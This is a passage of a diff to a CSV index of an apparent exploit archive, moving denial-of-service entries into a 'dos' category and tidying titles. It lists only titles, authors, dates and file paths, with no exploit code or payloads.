Vulnerability",2004-10-22,ls,cgi,webapps,0 24701,platforms/multiple/remote/24701.txt,"OpenWFE 1.4.x - Remote Cross-Site Scripting And Connection Proxy Vulnerabilities",2004-10-25,"Joxean Koret",multiple,remote,0 @@ -22410,7 +22410,7 @@ id,file,description,date,author,platform,type,port 25265,platforms/php/webapps/25265.txt,"phpSysInfo 2.0/2.3 index.php sensor_program Parameter XSS",2005-03-23,"Maksymilian Arciemowicz",php,webapps,0 25266,platforms/php/webapps/25266.txt,"phpSysInfo 2.0/2.3 system_footer.php Multiple Parameter XSS",2005-03-23,"Maksymilian Arciemowicz",php,webapps,0 25267,platforms/php/webapps/25267.txt,"Invision Power Board 1.x/2.0 HTML Injection Vulnerability",2005-03-23,"Woody Hughes",php,webapps,0 -25268,platforms/windows/local/25268.txt,"Microsoft Windows XP TSShutdn.exe Remote Denial of Service Vulnerability",2005-03-23,"Juha-Matti Laurio",windows,local,0 +25268,platforms/windows/dos/25268.txt,"Microsoft Windows XP - TSShutdn.exe Remote Denial of Service Vulnerability",2005-03-23,"Juha-Matti Laurio",windows,dos,0 25269,platforms/jsp/webapps/25269.txt,"Oracle Reports Server 10g Multiple Remote Cross-Site Scripting Vulnerabilities",2005-03-24,Paolo,jsp,webapps,0 25270,platforms/php/webapps/25270.txt,"Topic Calendar 1.0.1 Calendar_Scheduler.PHP Cross-Site Scripting Vulnerability",2004-03-24,"Alberto Trivero",php,webapps,0 25271,platforms/php/webapps/25271.txt,"Double Choco Latte 0.9.3/0.9.4 main.php Arbitrary PHP Code Execution",2005-03-24,"James Bercegay",php,webapps,0 @@ -22836,7 +22836,7 @@ id,file,description,date,author,platform,type,port 25689,platforms/php/webapps/25689.txt,"EJ3 TOPo 2.2 - Multiple Index.PHP Cross-Site Scripting Vulnerabilities",2003-05-20,Lostmon,php,webapps,0 25690,platforms/php/webapps/25690.pl,"PortailPHP 1.3 ID Parameter SQL Injection Vulnerability",2005-05-23,"CENSORED Search Vulnerabilities",php,webapps,0 25691,platforms/multiple/remote/25691.txt,"Warrior Kings 1.3 And Warrior Kings: Battles 1.23 - Remote Format String Vulnerability",2005-05-23,"Luigi Auriemma",multiple,remote,0 -25692,platforms/multiple/remote/25692.txt,"Warrior Kings: Battles 1.23 - Remote Denial of Service Vulnerability",2005-05-23,"Luigi Auriemma",multiple,remote,0 +25692,platforms/multiple/dos/25692.txt,"Warrior Kings: Battles 1.23 - Remote Denial of Service Vulnerability",2005-05-23,"Luigi Auriemma",multiple,dos,0 25693,platforms/php/webapps/25693.txt,"GForge 3.x - Remote Arbitrary Command Execution Vulnerability",2005-05-24,"Filippo Spike Morelli",php,webapps,0 25694,platforms/windows/remote/25694.txt,"Sambar Server 5.x/6.0/6.1 results.stm indexname XSS",2005-05-24,"Jamie Fisher",windows,remote,0 25695,platforms/windows/remote/25695.txt,"Sambar Server 5.x/6.0/6.1 logout RCredirect XSS",2005-05-24,"Jamie Fisher",windows,remote,0 @@ -23397,7 +23397,7 @@ id,file,description,date,author,platform,type,port 26245,platforms/windows/local/26245.py,"Winamp 5.12 - (.m3u) Stack Based Buffer Overflow",2013-06-17,superkojiman,windows,local,0 26246,platforms/php/webapps/26246.txt,"Simple File Manager 024 - Login Bypass Vulnerability",2013-06-17,Chako,php,webapps,0 26247,platforms/php/webapps/26247.txt,"MyBulletinBoard 1.0 RateThread.PHP SQL Injection Vulnerability",2005-09-09,stranger-killer,php,webapps,0 -26248,platforms/linux/local/26248.sh,"Linux Kernel 2.6.x - SCSI ProcFS Denial of Service Vulnerability",2005-09-09,anonymous,linux,local,0 +26248,platforms/linux/dos/26248.sh,"Linux Kernel 2.6.x - SCSI ProcFS Denial of Service Vulnerability",2005-09-09,anonymous,linux,dos,0 26249,platforms/linux/dos/26249.c,"Zebedee 2.4.1 - Remote Denial of Service Vulnerability",2005-09-09,Shiraishi.M,linux,dos,0 26250,platforms/multiple/dos/26250.pl,"COOL! Remote Control 1.12 - Remote Denial of Service Vulnerability",2005-09-12,"Infam0us Gr0up",multiple,dos,0 26251,platforms/linux/dos/26251.c,"Snort 2.x PrintTcpOptions Remote Denial of Service Vulnerability",2005-09-12,"VulnFact Security Labs",linux,dos,0 @@ -23468,7 +23468,7 @@ id,file,description,date,author,platform,type,port 26325,platforms/multiple/dos/26325.txt,"Mozilla Firefox 1.0.6/1.0.7 IFRAME Handling Denial of Service Vulnerability",2005-10-05,"Tom Ferris",multiple,dos,0 26326,platforms/php/webapps/26326.html,"MyBloggie 2.1.3 - Search.PHP SQL Injection Vulnerability",2005-10-06,trueend5,php,webapps,0 26335,platforms/asp/webapps/26335.txt,"Aenovo Multiple Unspecified Cross-Site Scripting Vulnerabilities",2005-10-07,"farhad koosha",asp,webapps,0 -26336,platforms/multiple/remote/26336.txt,"Oracle Forms Servlet TLS Listener Remote Denial of Service Vulnerability",2005-10-07,"Alexander Kornbrust",multiple,remote,0 +26336,platforms/multiple/dos/26336.txt,"Oracle Forms - Servlet TLS Listener Remote Denial of Service Vulnerability",2005-10-07,"Alexander Kornbrust",multiple,dos,0 26337,platforms/php/webapps/26337.php,"Cyphor 0.19 lostpwd.php nick Field SQL Injection",2005-10-08,rgod,php,webapps,0 26338,platforms/php/webapps/26338.txt,"Cyphor 0.19 newmsg.php fid Parameter SQL Injection",2005-10-08,retrogod@aliceposta.it,php,webapps,0 26339,platforms/php/webapps/26339.txt,"Cyphor 0.19 footer.php t_login Parameter XSS",2005-10-08,retrogod@aliceposta.it,php,webapps,0 @@ -23514,7 +23514,7 @@ id,file,description,date,author,platform,type,port 26379,platforms/php/webapps/26379.txt,"Chipmunk Forum quote.php forumID Parameter XSS",2005-10-20,"Alireza Hassani",php,webapps,0 26380,platforms/php/webapps/26380.txt,"Chipmunk Forum recommend.php ID Parameter XSS",2005-10-20,"Alireza Hassani",php,webapps,0 26381,platforms/php/webapps/26381.txt,"Chipmunk Directory recommend.php entryID Parameter XSS",2005-10-20,"Alireza Hassani",php,webapps,0 -26382,platforms/linux/local/26382.c,"Linux Kernel 2.6.x - IPV6 - Local Denial of Service Vulnerability",2005-10-20,"Rémi Denis-Courmont",linux,local,0 +26382,platforms/linux/dos/26382.c,"Linux Kernel 2.6.x - IPv6 Local Denial of Service Vulnerability",2005-10-20,"Rémi Denis-Courmont",linux,dos,0 26383,platforms/php/webapps/26383.txt,"Zomplog 3.3/3.4 Detail.PHP HTML Injection Vulnerability",2005-10-22,sikikmail,php,webapps,0 26384,platforms/php/webapps/26384.txt,"FlatNuke 2.5.x Index.PHP Multiple Remote File Include Vulnerabilities",2005-10-22,abducter_minds@yahoo.com,php,webapps,0 26385,platforms/php/webapps/26385.txt,"FlatNuke 2.5.x Index.PHP Cross-Site Scripting Vulnerability",2005-10-26,alex@aleksanet.com,php,webapps,0 @@ -23620,7 +23620,7 @@ id,file,description,date,author,platform,type,port 26486,platforms/php/webapps/26486.txt,"SAP Web Application Server 6.x/7.0 Error Page XSS",2005-11-09,"Leandro Meiners",php,webapps,0 26487,platforms/php/webapps/26487.txt,"SAP Web Application Server 6.x/7.0 frameset.htm sap-syscmd Parameter XSS",2005-11-09,"Leandro Meiners",php,webapps,0 26488,platforms/php/webapps/26488.txt,"SAP Web Application Server 6.x/7.0 URI Redirection Vulnerability",2005-11-09,"Leandro Meiners",php,webapps,0 -26489,platforms/linux/local/26489.c,"Linux Kernel 2.6.x - Sysctl Unregistration Local Denial of Service Vulnerability",2005-11-09,"Rémi Denis-Courmont",linux,local,0 +26489,platforms/linux/dos/26489.c,"Linux Kernel 2.6.x - Sysctl Unregistration Local Denial of Service Vulnerability",2005-11-09,"Rémi Denis-Courmont",linux,dos,0 26490,platforms/php/webapps/26490.txt,"TikiWiki 1.9 Tiki-view_forum_thread.PHP Cross-Site Scripting Vulnerability",2005-11-09,"Moritz Naumann",php,webapps,0 26491,platforms/windows/remote/26491.txt,"Antville 1.1 - Cross-Site Scripting Vulnerability",2005-11-09,"Moritz Naumann",windows,remote,0 26492,platforms/linux/local/26492.txt,"Emacs 2.1 - Local Variable Arbitrary Command Execution Vulnerability",2002-12-31,"Georgi Guninski",linux,local,0 @@ -23820,7 +23820,7 @@ id,file,description,date,author,platform,type,port 26687,platforms/php/webapps/26687.txt,"WebCalendar 1.0.1 - Multiple SQL Injection Vulnerabilities",2005-12-01,lwang,php,webapps,0 26688,platforms/php/webapps/26688.php,"Lore 1.5.4/1.5.6 - 'article.php' SQL Injection Vulnerability",2005-12-01,r0t,php,webapps,0 26689,platforms/php/webapps/26689.txt,"DotClear 1.2.1/1.2.2 Session.PHP SQL Injection Vulnerability",2005-12-01,Siegfried,php,webapps,0 -26690,platforms/windows/local/26690.c,"Microsoft Windows 2000/2003/XP CreateRemoteThread Local Denial of Service Vulnerability",2005-12-01,"Nima Salehi",windows,local,0 +26690,platforms/windows/dos/26690.c,"Microsoft Windows 2000/2003/XP - CreateRemoteThread Local Denial of Service Vulnerability",2005-12-01,"Nima Salehi",windows,dos,0 26691,platforms/php/webapps/26691.txt,"WebCalendar 1.0.1 Layers_Toggle.PHP HTTP Response Splitting Vulnerability",2005-12-01,lwang,php,webapps,0 26692,platforms/php/webapps/26692.txt,"Extreme Corporate 6.0 Extremesearch.PHP Cross-Site Scripting Vulnerability",2005-12-01,r0t,php,webapps,0 26693,platforms/php/webapps/26693.txt,"Edgewall Software Trac 0.9 Ticket Query Module SQL Injection Vulnerability",2005-12-01,"David Maciejak",php,webapps,0 @@ -24386,7 +24386,7 @@ id,file,description,date,author,platform,type,port 27255,platforms/php/webapps/27255.txt,"PostNuke 0.6x/0.7x NS-Languages Module language Parameter SQL Injection",2006-02-21,"Maksymilian Arciemowicz",php,webapps,0 27256,platforms/php/webapps/27256.txt,"RunCMS 1.x Ratefile.PHP Cross-Site Scripting Vulnerability",2006-02-22,"Roozbeh Afrasiabi",php,webapps,0 27257,platforms/linux/dos/27257.html,"Multiple Mozilla Products IFRAME JavaScript Execution Vulnerabilit",2006-02-22,"Georgi Guninski",linux,dos,0 -27258,platforms/asp/webapps/27258.txt,"Ipswitch WhatsUp Professional 2006 - Remote Denial of Service Vulnerability",2006-02-22,"Josh Zlatin-Amishav",asp,webapps,0 +27258,platforms/asp/dos/27258.txt,"Ipswitch WhatsUp Professional 2006 - Remote Denial of Service Vulnerability",2006-02-22,"Josh Zlatin-Amishav",asp,dos,0 27259,platforms/php/webapps/27259.txt,"Noah's Classifieds 1.0/1.3 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2006-02-22,trueend5,php,webapps,0 27260,platforms/php/webapps/27260.txt,"Noah's Classifieds 1.0/1.3 - Search Page SQL Injection Vulnerability",2006-02-22,trueend5,php,webapps,0 27261,platforms/php/webapps/27261.txt,"Noah's Classifieds 1.0/1.3 - Local File Include Vulnerability",2006-02-22,trueend5,php,webapps,0 @@ -24883,7 +24883,7 @@ id,file,description,date,author,platform,type,port 27857,platforms/php/webapps/27857.txt,"phpBB Chart Mod 1.1 charts.php id Parameter SQL Injection",2006-05-11,sn4k3.23,php,webapps,0 27773,platforms/php/webapps/27773.txt,"CBHotel Hotel Software and Booking system 1.8 - Multiple Vulnerabilities",2013-08-22,"Dylan Irzi",php,webapps,0 27774,platforms/hardware/webapps/27774.py,"Netgear ProSafe - Information Disclosure Vulnerability",2013-08-22,"Juan J. Guelfo",hardware,webapps,0 -27775,platforms/hardware/webapps/27775.py,"Netgear ProSafe - Denial of Service Vulnerability",2013-08-22,"Juan J. Guelfo",hardware,webapps,0 +27775,platforms/hardware/dos/27775.py,"Netgear ProSafe - Denial of Service Vulnerability",2013-08-22,"Juan J. Guelfo",hardware,dos,0 27776,platforms/linux/webapps/27776.rb,"Foreman (Red Hat OpenStack/Satellite) users/create Mass Assignment",2013-08-22,metasploit,linux,webapps,443 27777,platforms/windows/webapps/27777.txt,"DeWeS 0.4.2 - Directory Traversal Vulnerability",2013-08-22,"High-Tech Bridge SA",windows,webapps,0 27778,platforms/linux/dos/27778.txt,"Samba nttrans Reply - Integer Overflow Vulnerability",2013-08-22,x90c,linux,dos,139 @@ -25293,7 +25293,7 @@ id,file,description,date,author,platform,type,port 28224,platforms/windows/remote/28224.c,"Microsoft PowerPoint 2003 mso.dll PPT Processing Unspecified Code Execution",2006-07-14,"naveed afzal",windows,remote,0 28225,platforms/windows/remote/28225.c,"Microsoft PowerPoint 2003 powerpnt.exe Unspecified Issue",2006-07-14,"naveed afzal",windows,remote,0 28226,platforms/windows/remote/28226.c,"Microsoft PowerPoint 2003 PPT File Closure Memory Corruption",2006-07-14,"naveed afzal",windows,remote,0 -28227,platforms/windows/local/28227.txt,"Microsoft Windows 2000/XP Registry Access Local Denial of Service Vulnerability",2006-07-15,"David Matousek",windows,local,0 +28227,platforms/windows/dos/28227.txt,"Microsoft Windows 2000/XP - Registry Access Local Denial of Service Vulnerability",2006-07-15,"David Matousek",windows,dos,0 28228,platforms/hardware/dos/28228.txt,"Sunbelt Kerio Personal Firewall 4.3.426 CreateRemoteThread Denial of Service Vulnerability",2006-07-15,"David Matousek",hardware,dos,0 28229,platforms/php/webapps/28229.txt,"VisNetic Mail Server 8.3.5 - Multiple File Include Vulnerabilities",2006-07-17,"Tan Chew Keong",php,webapps,0 28230,platforms/hardware/dos/28230.txt,"Multiple D-Link Routers UPNP Buffer Overflow Vulnerability",2006-07-17,"Barnaby Jack",hardware,dos,0 @@ -25886,7 +25886,7 @@ id,file,description,date,author,platform,type,port 28840,platforms/php/webapps/28840.txt,"SchoolAlumni Portal 2.26 mod.php mod Parameter Traversal Local File Inclusion",2006-10-23,MP,php,webapps,0 28841,platforms/php/webapps/28841.txt,"RMSOFT Gallery System 2.0 Images.PHP Cross-Site Scripting Vulnerability",2006-10-23,FREAK_PR,php,webapps,0 28842,platforms/php/webapps/28842.txt,"Zwahlen's Online Shop 5.2.2 Cat Parameter Cross-Site Scripting Vulnerability",2006-10-23,MC.Iglo,php,webapps,0 -28843,platforms/php/webapps/28843.txt,"cPanel 10.9 DoSetmytheme theme Parameter XSS",2006-10-23,Crackers_Child,php,webapps,0 +28843,platforms/php/webapps/28843.txt,"cPanel 10.9 - DoSetmytheme theme Parameter XSS",2006-10-23,Crackers_Child,php,webapps,0 28844,platforms/php/webapps/28844.txt,"cPanel 10.9 editzonetemplate template Parameter XSS",2006-10-23,Crackers_Child,php,webapps,0 28845,platforms/php/webapps/28845.txt,"Shop-Script Multiple HTTP Response Splitting Vulnerabilities",2006-10-23,"Debasis Mohanty",php,webapps,0 28846,platforms/php/webapps/28846.html,"WikiNi 0.4.x Waka.PHP Multiple HTML-Injection Vulnerabilities",2006-10-23,"Raphael Huck",php,webapps,0 @@ -26182,7 +26182,7 @@ id,file,description,date,author,platform,type,port 29134,platforms/asp/webapps/29134.txt,"Rapid Classified 3.1 view_print.asp id Parameter XSS",2006-11-20,"laurent gaffie",asp,webapps,0 29135,platforms/asp/webapps/29135.txt,"Rapid Classified 3.1 - search.asp SH1 Parameter XSS",2006-11-20,"laurent gaffie",asp,webapps,0 29136,platforms/asp/webapps/29136.txt,"Rapid Classified 3.1 reply.asp Multiple Parameter XSS",2006-11-20,"laurent gaffie",asp,webapps,0 -29137,platforms/asp/webapps/29137.txt,"Rapid Classified 3.1 advsearch.asp DoSearch Parameter XSS",2006-11-20,"laurent gaffie",asp,webapps,0 +29137,platforms/asp/webapps/29137.txt,"Rapid Classified 3.1 - advsearch.asp DoSearch Parameter XSS",2006-11-20,"laurent gaffie",asp,webapps,0 29157,platforms/php/webapps/29157.txt,"Seditio 1.10 Users.Profile.Inc.PHP SQL Injection Vulnerability",2006-11-21,"Mustafa Can Bjorn",php,webapps,0 29158,platforms/php/webapps/29158.txt,"CuteNews 1.4.5 show_news.php Query String XSS",2006-11-21,"Alireza Hassani",php,webapps,0 29159,platforms/php/webapps/29159.txt,"CuteNews 1.4.5 rss.php rss_title Parameter XSS",2006-11-21,"Alireza Hassani",php,webapps,0 @@ -26589,7 +26589,7 @@ id,file,description,date,author,platform,type,port 29680,platforms/php/webapps/29680.html,"SQLiteManager 1.2 Main.PHP Multiple HTML Injection Vulnerabilities",2007-02-26,"Simon Bonnard",php,webapps,0 29681,platforms/php/webapps/29681.txt,"Pagesetter 6.2/6.3.0 index.PHP Local File Include Vulnerability",2007-02-26,"D. Matscheko",php,webapps,0 29682,platforms/php/webapps/29682.txt,"Wordpress 2.1.1 - Post.PHP Cross-Site Scripting Vulnerability",2007-02-26,Samenspender,php,webapps,0 -29683,platforms/linux/local/29683.txt,"Linux Kernel 2.6.x - Audit Subsystems Local Denial of Service Vulnerability",2007-02-27,"Steve Grubb",linux,local,0 +29683,platforms/linux/dos/29683.txt,"Linux Kernel 2.6.x - Audit Subsystems Local Denial of Service Vulnerability",2007-02-27,"Steve Grubb",linux,dos,0 29684,platforms/php/webapps/29684.txt,"Wordpress 2.1.1 - Multiple Cross-Site Scripting Vulnerabilities",2007-02-27,"Stefan Friedli",php,webapps,0 29685,platforms/windows/remote/29685.txt,"Nullsoft Shoutcast 1.9.7 Logfile HTML Injection Vulnerability",2007-02-27,SaMuschie,windows,remote,0 29686,platforms/windows/remote/29686.txt,"Adobe Acrobat/Adobe Reader <= 7.0.9 - Information Disclosure Vulnerability",2007-02-28,pdp,windows,remote,0 @@ -27145,7 +27145,7 @@ id,file,description,date,author,platform,type,port 30101,platforms/php/webapps/30101.txt,"CPCommerce 1.1 Manufacturer.PHP SQL Injection Vulnerability",2007-05-29,"laurent gaffie",php,webapps,0 30102,platforms/php/webapps/30102.php,"Pheap 2.0 Config.PHP Pheap_Login Authentication Bypass Vulnerability",2007-05-30,Silentz,php,webapps,0 30103,platforms/php/webapps/30103.txt,"Particle Blogger <= 1.2.1 Archives.PHP SQL Injection Vulnerability",2007-03-16,Serapis.net,php,webapps,0 -30104,platforms/windows/remote/30104.nasl,"F-Secure Policy Manager 7.00 FSMSH.DLL Remote Denial of Service Vulnerability",2007-05-30,"David Maciejak",windows,remote,0 +30104,platforms/windows/dos/30104.nasl,"F-Secure Policy Manager 7.00 - FSMSH.DLL Remote Denial of Service Vulnerability",2007-05-30,"David Maciejak",windows,dos,0 30193,platforms/windows/dos/30193.html,"Apple Safari 3.0.1 for Windows Corefoundation.DLL Denial of Service Vulnerability",2007-06-16,Lostmon,windows,dos,0 30194,platforms/windows/dos/30194.txt,"Apple Safari 3 for Windows Document.Location Denial of Service Vulnerability",2007-06-16,azizov,windows,dos,0 30209,platforms/windows/remote/30209.rb,"HP LoadRunner EmulationAdmin - Web Service Directory Traversal",2013-12-11,metasploit,windows,remote,8080 @@ -27245,7 +27245,7 @@ id,file,description,date,author,platform,type,port 30390,platforms/php/webapps/30390.txt,"BSM Store Dependent Forums 1.02 UserName Parameter SQL Injection Vulnerability",2007-07-26,"Aria-Security Team",php,webapps,0 30391,platforms/php/webapps/30391.txt,"PhpHostBot 1.05 - Authorize.PHP Remote File Include Vulnerability",2007-07-26,S4M3K,php,webapps,0 30392,platforms/windows/local/30392.rb,"Microsoft Windows ndproxy.sys - Local Privilege Escalation",2013-12-17,metasploit,windows,local,0 -30308,platforms/windows/local/30308.py,"PotPlayer 1.5.42509 Beta - DoS (Integer Division by Zero Exploit)",2013-12-15,sajith,windows,local,0 +30308,platforms/windows/dos/30308.py,"PotPlayer 1.5.42509 Beta - DoS (Integer Division by Zero Exploit)",2013-12-15,sajith,windows,dos,0 30801,platforms/php/webapps/30801.txt,"Bandersnatch 0.4 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-11-23,"Tim Brown",php,webapps,0 30310,platforms/php/webapps/30310.txt,"Piwigo 2.5.3 CMS - Multiple Web Vulnerabilities",2013-12-15,sajith,php,webapps,0 30311,platforms/ios/webapps/30311.txt,"Phone Drive Eightythree 4.1.1 iOS - Multiple Vulnerabilities",2013-12-15,Vulnerability-Lab,ios,webapps,0 @@ -27328,7 +27328,7 @@ id,file,description,date,author,platform,type,port 30427,platforms/asp/webapps/30427.txt,"Pay Roll Time Sheet and Punch Card Application With Web UI Login.ASP SQL Injection Vulnerability",2007-07-28,"Aria-Security Team",asp,webapps,0 30428,platforms/asp/webapps/30428.txt,"Real Estate Listing Website Application Template Login Dialog SQL Injection Vulnerability",2007-07-28,"Aria-Security Team",asp,webapps,0 30429,platforms/php/webapps/30429.txt,"phpCoupon Remote Payment Bypass Vulnerability",2007-07-28,freeprotect.net,php,webapps,0 -30430,platforms/linux/remote/30430.txt,"Fail2ban <= 0.8 - Remote Denial of Service Vulnerability",2007-07-28,"Daniel B. Cid",linux,remote,0 +30430,platforms/linux/dos/30430.txt,"Fail2ban <= 0.8 - Remote Denial of Service Vulnerability",2007-07-28,"Daniel B. Cid",linux,dos,0 30431,platforms/windows/remote/30431.html,"Baidu Soba Search Bar 5.4 BaiduBar.DLL ActiveX Control Remote Code Execution Vulnerability",2007-07-29,cocoruder,windows,remote,0 30432,platforms/novell/remote/30432.txt,"Novell GroupWise 6.5 WebAccess User.Id Parameter Cross-Site Scripting Vulnerability",2007-07-30,0x000000,novell,remote,0 30433,platforms/php/webapps/30433.txt,"IT!CMS 0.2 lang-en.php wndtitle Parameter XSS",2007-07-30,"Aria-Security Team",php,webapps,0 @@ -27639,7 +27639,7 @@ id,file,description,date,author,platform,type,port 30686,platforms/php/webapps/30686.txt,"SiteBar <= 3.3.8 command.php Modify User Action uid Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0 30804,platforms/php/webapps/30804.txt,"VBTube 1.1 - Search Cross-Site Scripting Vulnerability",2007-11-24,Crackers_Child,php,webapps,0 30805,platforms/windows/dos/30805.html,"RichFX Basic Player 1.1 - ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-11-25,"Elazar Broad",windows,dos,0 -30688,platforms/hardware/webapps/30688.py,"Motorola SBG6580 Cable Modem & Wireless Router - DoS Reboot",2014-01-04,nicx0,hardware,webapps,0 +30688,platforms/hardware/dos/30688.py,"Motorola SBG6580 Cable Modem & Wireless Router - DoS Reboot",2014-01-04,nicx0,hardware,dos,0 30689,platforms/php/webapps/30689.php,"Taboada Macronews <= 1.0 - SQLi Exploit",2014-01-04,Jefrey,php,webapps,0 31027,platforms/php/webapps/31027.txt,"pMachine Pro 2.4.1 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-14,fuzion,php,webapps,0 31028,platforms/php/webapps/31028.txt,"Article Dashboard 'admin/login.php' Multiple SQL Injection Vulnerabilities",2008-01-15,Xcross87,php,webapps,0 @@ -27696,7 +27696,7 @@ id,file,description,date,author,platform,type,port 30741,platforms/php/webapps/30741.txt,"easyGB 2.1.1 Index.PHP Local File Include Vulnerability",2007-11-05,"BorN To K!LL",php,webapps,0 30742,platforms/multiple/remote/30742.txt,"OpenBase 10.0.x - Buffer Overflow Vulnerability and Multiple Remote Command Execution Vulnerabilities",2007-11-05,"Kevin Finisterre",multiple,remote,0 30743,platforms/asp/webapps/30743.txt,"i-Gallery 3.4 igallery.ASP Remote Information Disclosure Vulnerability",2007-11-05,hackerbinhphuoc,asp,webapps,0 -30744,platforms/linux/remote/30744.txt,"MySQL <= 5.1.23 Server InnoDB CONVERT_SEARCH_MODE_TO_INNOBASE Function Denial Of Service Vulnerability",2007-11-05,"Joe Gallo",linux,remote,0 +30744,platforms/linux/dos/30744.txt,"MySQL <= 5.1.23 - Server InnoDB CONVERT_SEARCH_MODE_TO_INNOBASE Function Denial Of Service Vulnerability",2007-11-05,"Joe Gallo",linux,dos,0 30745,platforms/php/webapps/30745.html,"Weblord.it MS-TopSites Unauthorized Access Vulnerability and HTML Injection Vulnerability",2007-11-06,0x90,php,webapps,0 30746,platforms/php/webapps/30746.txt,"Computer Associates SiteMinder Web Agent Smpwservices.FCC Cross-Site Scripting Vulnerability",2007-11-07,"Giuseppe Gottardi",php,webapps,0 30747,platforms/asp/webapps/30747.txt,"Rapid Classified AgencyCatResult.ASP SQL Injection Vulnerability",2007-11-08,The-0utl4w,asp,webapps,0 @@ -27705,10 +27705,10 @@ id,file,description,date,author,platform,type,port 30750,platforms/php/webapps/30750.pl,"PHP-Nuke Advertising Module 0.9 Modules.PHP SQL Injection Vulnerability",2007-11-12,0x90,php,webapps,0 30751,platforms/php/webapps/30751.html,"Miro Broadcast Machine 0.9.9 Login.PHP Cross-Site Scripting Vulnerability",2007-11-12,"Hanno Boeck",php,webapps,0 30752,platforms/php/webapps/30752.txt,"Eggblog 3.1 Rss.PHP Cross-Site Scripting Vulnerability",2007-11-12,"Mesut Timur",php,webapps,0 -30753,platforms/php/webapps/30753.txt,"AutoIndex PHP Script 2.2.2/2.2.3 Index.PHP Denial of Service Vulnerability",2007-11-12,L4teral,php,webapps,0 +30753,platforms/php/dos/30753.txt,"AutoIndex PHP Script 2.2.2/2.2.3 - Index.PHP Denial of Service Vulnerability",2007-11-12,L4teral,php,dos,0 30754,platforms/php/webapps/30754.txt,"AutoIndex PHP Script 2.2.2 PHP_SELF Index.PHP Cross-Site Scripting Vulnerability",2007-08-27,L4teral,php,webapps,0 30755,platforms/hardware/remote/30755.txt,"F5 FirePass 4100 SSL VPN Download_Plugin.PHP3 - Cross-Site Scripting Vulnerability",2007-11-12,"Jan Fry",hardware,remote,0 -30756,platforms/windows/remote/30756.html,"Microsoft Forms 2.0 - ActiveX Control 2.0 Memory Access Violation Denial of Service Vulnerabilities",2007-11-12,"Elazar Broad",windows,remote,0 +30756,platforms/windows/dos/30756.html,"Microsoft Forms 2.0 - ActiveX Control 2.0 Memory Access Violation Denial of Service Vulnerabilities",2007-11-12,"Elazar Broad",windows,dos,0 30757,platforms/php/webapps/30757.txt,"X7 Chat 2.0.4 sources/frame.php room Parameter XSS",2007-11-12,ShAy6oOoN,php,webapps,0 30758,platforms/php/webapps/30758.txt,"X7 Chat 2.0.4 upgradev1.php INSTALL_X7CHATVERSION Parameter XSS",2007-11-12,ShAy6oOoN,php,webapps,0 30759,platforms/cgi/webapps/30759.txt,"VTLS Web Gateway 48.1 - Searchtype Parameter Cross-Site Scripting Vulnerability",2007-11-13,"Jesus Olmos Gonzalez",cgi,webapps,0 @@ -27809,7 +27809,7 @@ id,file,description,date,author,platform,type,port 30892,platforms/php/webapps/30892.txt,"Neuron News 1.0 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2007-12-17,"hadihadi & black.shadowes",php,webapps,0 30893,platforms/php/webapps/30893.txt,"PHP Security Framework Multiple Input Validation Vulnerabilities",2007-12-17,DarkFig,php,webapps,0 30894,platforms/linux/dos/30894.txt,"PeerCast 0.12 HandshakeHTTP Multiple Buffer Overflow Vulnerabilities",2007-12-17,"Luigi Auriemma",linux,dos,0 -30895,platforms/linux/remote/30895.pl,"Perl Net::DNS 0.48/0.59/0.60 DNS Response Remote Denial of Service Vulnerability",2007-12-17,beSTORM,linux,remote,0 +30895,platforms/linux/dos/30895.pl,"Perl Net::DNS 0.48/0.59/0.60 - DNS Response Remote Denial of Service Vulnerability",2007-12-17,beSTORM,linux,dos,0 30896,platforms/multiple/dos/30896.txt,"Appian Business Process Management Suite 5.6 - Remote Denial of Service Vulnerability",2007-12-17,"Chris Castaldo",multiple,dos,0 30897,platforms/windows/remote/30897.html,"iMesh 7 - 'IMWebControl' ActiveX Control Code Execution Vulnerability",2007-12-17,rgod,windows,remote,0 30898,platforms/linux/dos/30898.pl,"Common UNIX Printing System 1.2/1.3 SNMP 'asn1_get_string()' Remote Buffer Overflow Vulnerability",2007-11-06,wei_wang,linux,dos,0 @@ -27917,7 +27917,7 @@ id,file,description,date,author,platform,type,port 31013,platforms/hardware/remote/31013.txt,"2Wire Routers - Cross-Site Request Forgery Vulnerability",2008-01-15,hkm,hardware,remote,0 31014,platforms/windows/dos/31014.py,"haneWIN DNS Server 1.5.3 - Denial of Service",2014-01-17,sajith,windows,dos,53 31015,platforms/php/webapps/31015.txt,"bloofox CMS 0.5.0 - Multiple Vulnerabilities",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,80 -31017,platforms/asp/webapps/31017.php,"SmarterMail Enterprise and Standard <=11.x - Stored XSS",2014-01-17,"Saeed reza Zamanian",asp,webapps,80 +31017,platforms/asp/webapps/31017.php,"SmarterMail Enterprise and Standard <= 11.x - Stored XSS",2014-01-17,"Saeed reza Zamanian",asp,webapps,80 31018,platforms/linux/dos/31018.txt,"GStreamer 0.10.15 - Multiple Unspecified Remote Denial of Service Vulnerabilities",2008-01-11,"Sam Hocevar",linux,dos,0 31020,platforms/php/webapps/31020.txt,"Moodle <= 1.8.3 - 'install.php' Cross-Site Scripting Vulnerability",2008-01-12,"Hanno Bock",php,webapps,0 31021,platforms/osx/dos/31021.html,"Apple Safari <= 2.0.4 KHTML WebKit Remote Denial of Service Vulnerability",2008-01-12,"David Barroso",osx,dos,0 @@ -29188,7 +29188,7 @@ id,file,description,date,author,platform,type,port 32359,platforms/php/remote/32359.txt,"SePortal 2.5 - SQL Injection Vulnerabilty",2014-03-19,jsass,php,remote,0 32360,platforms/php/webapps/32360.txt,"Nooms 1.1 - smileys.php page_id Parameter XSS",2008-09-11,Dr.Crash,php,webapps,0 32361,platforms/php/webapps/32361.txt,"Nooms 1.1 - search.php q Parameter XSS",2008-09-11,Dr.Crash,php,webapps,0 -32362,platforms/multiple/remote/32362.txt,"Unreal Engine 3 - Failed Memory Allocation Remote Denial of Service Vulnerability",2008-09-12,"Luigi Auriemma",multiple,remote,0 +32362,platforms/multiple/dos/32362.txt,"Unreal Engine 3 - Failed Memory Allocation Remote Denial of Service Vulnerability",2008-09-12,"Luigi Auriemma",multiple,dos,0 32363,platforms/multiple/remote/32363.txt,"Epic Games Unreal Engine 436 - Multiple Format String Vulnerabilities",2008-09-11,"Luigi Auriemma",multiple,remote,0 